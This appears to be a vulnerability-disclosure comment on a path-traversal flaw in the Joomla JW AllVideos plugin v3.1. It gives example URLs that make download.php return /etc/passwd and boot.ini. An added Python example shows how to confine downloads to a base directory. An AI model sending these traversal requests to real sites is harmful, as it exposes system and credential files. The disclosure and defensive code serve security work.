Hey there,

I was able to exploit this issue by slightly modifying the exploit you described against the latest version v3.1 (plg_jw_allvideos-v3.1_j1.5.zip). You can download it from here: http://joomlaworks.googlecode.com/files/plg_jw_allvideos-v3.1_j1.5.zip

Here's an example:

http://site.com/plugins/content/jw_allvideos/includes/download.php?file=images/../../../../../../etc/passwd

or

http://site.com/plugins/content/jw_allvideos/includes/download.php?file=images/../../../../../../boot.ini

-Mehul
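The check a download handler needs against the `file` values reported above, as an added example that is not part of the original comment and not the plugin's code. The function names, the temporary directory layout and the prefix-only check shown for contrast are assumptions made for illustration.

```python
import os
import tempfile

def prefix_only_check(requested):
    # Weak check shown for contrast (an assumption, not the plugin's code):
    # it inspects only the leading directory name.
    return requested.startswith("images/")

def resolve_download(base_dir, requested):
    """Return the real path of `requested` if it is a file inside base_dir, else None."""
    base = os.path.realpath(base_dir)
    if "\x00" in requested:
        return None
    # join() drops base for absolute input; realpath() collapses ".." and follows symlinks
    target = os.path.realpath(os.path.join(base, requested))
    # commonpath avoids the "/srv/site" vs "/srv/site-old" string-prefix mistake
    if os.path.commonpath([base, target]) != base:
        return None
    return target if os.path.isfile(target) else None

def run_demo():
    # Constructed layout: <root>/images/clip.flv stands in for the media directory
    root = tempfile.mkdtemp()
    outside = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "clip.flv"), "wb") as fh:
        fh.write(b"constructed sample")
    with open(os.path.join(outside, "secret.txt"), "wb") as fh:
        fh.write(b"constructed sample")
    # A symlink inside images/ that points outside the base directory
    os.symlink(outside, os.path.join(root, "images", "link"))
    requests = [
        "images/clip.flv",
        "images/../../../../../../etc/passwd",  # value from the comment above
        "images/link/secret.txt",
        "/etc/passwd",
    ]
    return {r: (prefix_only_check(r), resolve_download(root, r)) for r in requests}

if __name__ == "__main__":
    for value, (weak, strong) in run_demo().items():
        print(f"{value!r}: prefix_check={weak} resolved={strong}")
```

The value from the comment passes the prefix-only check but resolves outside the base directory, so `resolve_download` returns `None` for it.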